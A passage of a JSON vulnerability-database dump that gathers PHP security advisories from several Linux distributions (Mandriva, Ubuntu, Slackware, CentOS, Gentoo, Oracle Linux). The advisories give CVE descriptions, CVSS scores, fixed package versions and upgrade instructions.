vulnerability in the process_nested_data function in\r\n ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x before\r\n 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute\r\n arbitrary code via a crafted unserialize call that leverages improper\r\n handling of duplicate numerical keys within the serialized properties\r\n of an object. NOTE: this vulnerability exists because of an incomplete\r\n fix for CVE-2014-8142 (CVE-2015-0231).\r\n \r\n The exif_process_unicode function in ext/exif/exif.c in PHP before\r\n 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote\r\n attackers to execute arbitrary code or cause a denial of service\r\n (uninitialized pointer free and application crash) via crafted EXIF\r\n data in a JPEG image (CVE-2015-0232).\r\n \r\n The updated php packages have been upgraded to the 5.5.21 version\r\n which is not vulnerable to these issues.\r\n \r\n Additionally, the timezonedb package has been upgraded to the latest\r\n 2015.1 version, the php-suhosin package has been upgraded to the\r\n latest 0.9.37.1 and the PECL packages which requires so has been\r\n rebuilt for php-5.5.21.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9427\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0232\r\n http://php.net/ChangeLog-5.php#5.5.21\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n 
_______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFU05RlmqjQ0CJFipgRArmOAKDKYyVQrC1CpH9JKrd8HAhddB7oZQCgtdL8\r\n0rueIDnGzKxeJYZDOf8Kdvo=\r\n=3Yt1\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2015-02-11T00:00:00", "published": "2015-02-11T00:00:00", "id": "SECURITYVULNS:DOC:31712", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31712", "title": "[ MDVSA-2015:032 ] php", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:57", "bulletinFamily": "software", "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2501-1\r\nFebruary 17, 
2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 14.10\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nSeveral security issues were fixed in PHP.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nStefan Esser discovered that PHP incorrectly handled unserializing objects.\r\nA remote attacker could use this issue to cause PHP to crash, resulting in\r\na denial of service, or possibly execute arbitrary code. (CVE-2014-8142,\r\nCVE-2015-0231)\r\n\r\nBrian Carpenter discovered that the PHP CGI component incorrectly handled\r\ninvalid files. A local attacker could use this issue to obtain sensitive\r\ninformation, or possibly execute arbitrary code. This issue only affected\r\nUbuntu 14.04 LTS and Ubuntu 14.10. (CVE-2014-9427)\r\n\r\nIt was discovered that PHP incorrectly handled certain pascal strings in\r\nthe fileinfo extension. A remote attacker could possibly use this issue to\r\ncause PHP to crash, resulting in a denial of service. This issue only\r\naffected Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2014-9652)\r\n\r\nAlex Eubanks discovered that PHP incorrectly handled EXIF data in JPEG\r\nimages. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service, or possibly execute arbitrary code.\r\nThis issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2015-0232)\r\n\r\nIt was discovered that the PHP opcache component incorrectly handled\r\nmemory. A remote attacker could possibly use this issue to cause PHP to\r\ncrash, resulting in a denial of service, or possibly execute arbitrary\r\ncode. This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10.\r\n(CVE-2015-1351)\r\n\r\nIt was discovered that the PHP PostgreSQL database extension incorrectly\r\nhandled certain pointers. 
A remote attacker could possibly use this issue\r\nto cause PHP to crash, resulting in a denial of service, or possibly\r\nexecute arbitrary code. This issue only affected Ubuntu 14.04 LTS and\r\nUbuntu 14.10. (CVE-2015-1352)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 14.10:\r\n libapache2-mod-php5 5.5.12+dfsg-2ubuntu4.2\r\n php5-cgi 5.5.12+dfsg-2ubuntu4.2\r\n php5-cli 5.5.12+dfsg-2ubuntu4.2\r\n php5-fpm 5.5.12+dfsg-2ubuntu4.2\r\n php5-pgsql 5.5.12+dfsg-2ubuntu4.2\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.6\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.6\r\n php5-cli 5.5.9+dfsg-1ubuntu4.6\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.6\r\n php5-pgsql 5.5.9+dfsg-1ubuntu4.6\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.16\r\n php5-cgi 5.3.10-1ubuntu3.16\r\n php5-cli 5.3.10-1ubuntu3.16\r\n php5-fpm 5.3.10-1ubuntu3.16\r\n php5-pgsql 5.3.10-1ubuntu3.16\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2501-1\r\n CVE-2014-8142, CVE-2014-9427, CVE-2014-9652, CVE-2015-0231,\r\n CVE-2015-0232, CVE-2015-1351, CVE-2015-1352\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.5.12+dfsg-2ubuntu4.2\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.6\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.16\r\n", "modified": "2015-02-22T00:00:00", "published": "2015-02-22T00:00:00", "id": "SECURITYVULNS:DOC:31728", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31728", "title": "[USN-2501-1] PHP vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "slackware": [{"lastseen": "2018-08-31T00:37:03", "bulletinFamily": "unix", "description": "New php packages are available for Slackware 14.0, 14.1, and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/php-5.4.36-i486-1_slack14.1.txz: Upgraded.\n This update fixes bugs and security issues.\n #68545 (NULL pointer dereference in unserialize.c).\n #68594 (Use after free vulnerability in unserialize()). (CVE-2014-8142)\n #68283 (fileinfo: out-of-bounds read in elf note headers). (CVE-2014-3710)\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3710\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8142\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.36-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.36-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.4.36-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.4.36-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.4.36-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.4.36-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 
package:\nd25a3e243ec1921b7ac321be40336251 php-5.4.36-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\nc374f5fef8a922ee1718232be4baefbf php-5.4.36-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n365000d20e974b045b2acc143ba6dfbe php-5.4.36-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n81fc269537befcc2fcb3be913588d8cc php-5.4.36-x86_64-1_slack14.1.txz\n\nSlackware -current package:\nbce0dc50b1430ed7a521b07795763922 n/php-5.4.36-i486-1.txz\n\nSlackware x86_64 -current package:\n6266e021adac91c16e68e61ee4bcdf9b n/php-5.4.36-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg php-5.4.36-i486-1_slack14.1.txz\n\nThen, restart Apache httpd:\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "modified": "2014-12-22T21:38:55", "published": "2014-12-22T21:38:55", "id": "SSA-2014-356-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.400170", "title": "php", "type": "slackware", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "centos": [{"lastseen": "2018-01-25T07:01:57", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2005:838-01\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server.\r\n\r\nA flaw was found in the way PHP registers global variables during a file\r\nupload request. A remote attacker could submit a carefully crafted\r\nmultipart/form-data POST request that would overwrite the $GLOBALS array,\r\naltering expected script behavior, and possibly leading to the execution of\r\narbitrary PHP commands. Note that this vulnerability only affects\r\ninstallations which have register_globals enabled in the PHP configuration\r\nfile, which is not a default or recommended option. 
The Common\r\nVulnerabilities and Exposures project assigned the name CVE-2005-3390 to\r\nthis issue.\r\n\r\nA flaw was found in the PHP parse_str() function. If a PHP script passes\r\nonly one argument to the parse_str() function, and the script can be forced\r\nto abort execution during operation (for example due to the memory_limit\r\nsetting), the register_globals may be enabled even if it is disabled in the\r\nPHP configuration file. This vulnerability only affects installations that\r\nhave PHP scripts using the parse_str function in this way. (CVE-2005-3389)\r\n\r\nA Cross-Site Scripting flaw was found in the phpinfo() function. If a\r\nvictim can be tricked into following a malicious URL to a site with a page\r\ndisplaying the phpinfo() output, it may be possible to inject javascript\r\nor HTML content into the displayed page or steal data such as cookies. \r\nThis vulnerability only affects installations which allow users to view the\r\noutput of the phpinfo() function. As the phpinfo() function outputs a\r\nlarge amount of information about the current state of PHP, it should only\r\nbe used during debugging or if protected by authentication. 
(CVE-2005-3388)\r\n\r\nAdditionally, a bug introduced in the updates to fix CVE-2004-1019 has been\r\ncorrected.\r\n\r\nUsers of PHP should upgrade to these updated packages, which contain\r\nbackported patches that resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/012392.html\n\n**Affected packages:**\nphp\nphp-devel\nphp-imap\nphp-ldap\nphp-manual\nphp-mysql\nphp-odbc\nphp-pgsql\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "modified": "2005-11-10T23:45:48", "published": "2005-11-10T23:45:48", "href": "http://lists.centos.org/pipermail/centos-announce/2005-November/012392.html", "id": "CESA-2005:838-01", "title": "php security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:04", "bulletinFamily": "unix", "description": "### Background\n\nPHP is a general-purpose scripting language widely used to develop web-based applications. It can run inside a web server using the mod_php module or the CGI version of PHP, or can run stand-alone in a CLI. \n\n### Description\n\nStefan Esser and Marcus Boerger reported several different issues in the unserialize() function, including serious exploitable bugs in the way it handles negative references (CAN-2004-1019). \n\nStefan Esser also discovered that the pack() and unpack() functions are subject to integer overflows that can lead to a heap buffer overflow and a heap information leak. Finally, he found that the way multithreaded PHP handles safe_mode_exec_dir restrictions can be bypassed, and that various path truncation issues also allow to bypass path and safe_mode restrictions. \n\nIlia Alshanetsky found a stack overflow issue in the exif_read_data() function (CAN-2004-1065). 
Finally, Daniel Fabian found that addslashes and magic_quotes_gpc do not properly escape null characters and that magic_quotes_gpc contains a bug that could lead to one level directory traversal. \n\n### Impact\n\nThese issues could be exploited by a remote attacker to retrieve web server heap information, bypass safe_mode or path restrictions and potentially execute arbitrary code with the rights of the web server running a PHP application. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll PHP users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-php/php-4.3.10\"\n\nAll mod_php users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-php/mod_php-4.3.10\"\n\nAll php-cgi users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-php/php-cgi-4.3.10\"", "modified": "2006-05-22T00:00:00", "published": "2004-12-19T00:00:00", "id": "GLSA-200412-14", "href": "https://security.gentoo.org/glsa/200412-14", "type": "gentoo", "title": "PHP: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-06T19:46:46", "bulletinFamily": "unix", "description": "### Background\n\nPHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. \n\n### Description\n\nMultiple vulnerabilities have been discovered in PHP. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker can leverage these vulnerabilities to execute arbitrary code or cause Denial of Service. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll PHP 5.5 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/php-5.5.21\"\n \n\nAll PHP 5.4 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/php-5.4.37\"\n \n\nAll PHP 5.3 users should upgrade to the latest version. This branch is currently past the end of life and it will no longer receive security fixes. All PHP 5.3 users are strongly recommended to upgrade to the current stable version of PHP 5.5 or previous stable version of PHP 5.4, which are supported till at least 2016 and 2015 respectively.", "modified": "2015-08-22T00:00:00", "published": "2015-03-08T00:00:00", "id": "GLSA-201503-03", "href": "https://security.gentoo.org/glsa/201503-03", "type": "gentoo", "title": "PHP: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:42:05", "bulletinFamily": "unix", "description": "php55\n[2.0-1]\n- fix incorrect selinux contexts #1194336\nphp55-php\n[5.5.21-2.0.1]\n- add dtrace-utils as build dependency\n[5.5.21-2]\n- core: fix use-after-free vulnerability in the\n process_nested_data function (unserialize) CVE-2015-2787\n- core: fix NUL byte injection in file name argument of\n move_uploaded_file() CVE-2015-2348\n- date: fix use after free vulnerability in unserialize()\n with DateTimeZone CVE-2015-0273\n- enchant: fix heap buffer overflow in\n enchant_broker_request_dict() CVE-2014-9705\n- ereg: fix heap overflow in regcomp() CVE-2015-2305\n- opcache: fix use after free CVE-2015-1351\n- phar: fix use after free in phar_object.c CVE-2015-2301\n- pgsql: fix NULL pointer dereference CVE-2015-1352\n- soap: fix type confusion through unserialize #1204868\n[5.5.21-1]\n- rebase to PHP 5.5.21\n[5.5.20-1]\n- rebase to PHP 5.5.20 #1057089\n- 
fix package name in description\n- php-fpm own session and wsdlcache dir\n- php-common doesn't provide php-gmp", "modified": "2016-02-04T00:00:00", "published": "2016-02-04T00:00:00", "id": "ELSA-2015-1053", "href": "http://linux.oracle.com/errata/ELSA-2015-1053.html", "title": "php55 security and bug fix update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:44:09", "bulletinFamily": "unix", "description": "php54\n[2.0-1]\n- fix incorrect selinux contexts #1194332\nphp54-php\n[5.4.40-1]\n- rebase to PHP 5.4.40 for various security fix #1209887\n[5.4.37-1]\n- rebase to PHP 5.4.37\n[5.4.36-1]\n- rebase to PHP 5.4.36 #1168193\n- fix package name in description\n- php-fpm own session dir\nphp54-php-pecl-zendopcache\n[7.0.4-3]\n- fix use after free CVE-2015-1351\n[7.0.4-2]\n- add upstream patch for failed test\n[7.0.4-1]\n- Update to 7.0.4\n[7.0.3-1]\n- update to 7.0.3 #1055927", "modified": "2016-02-04T00:00:00", "published": "2016-02-04T00:00:00", "id": "ELSA-2015-1066", "href": "http://linux.oracle.com/errata/ELSA-2015-1066.html", "title": "php54 security and bug fix update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}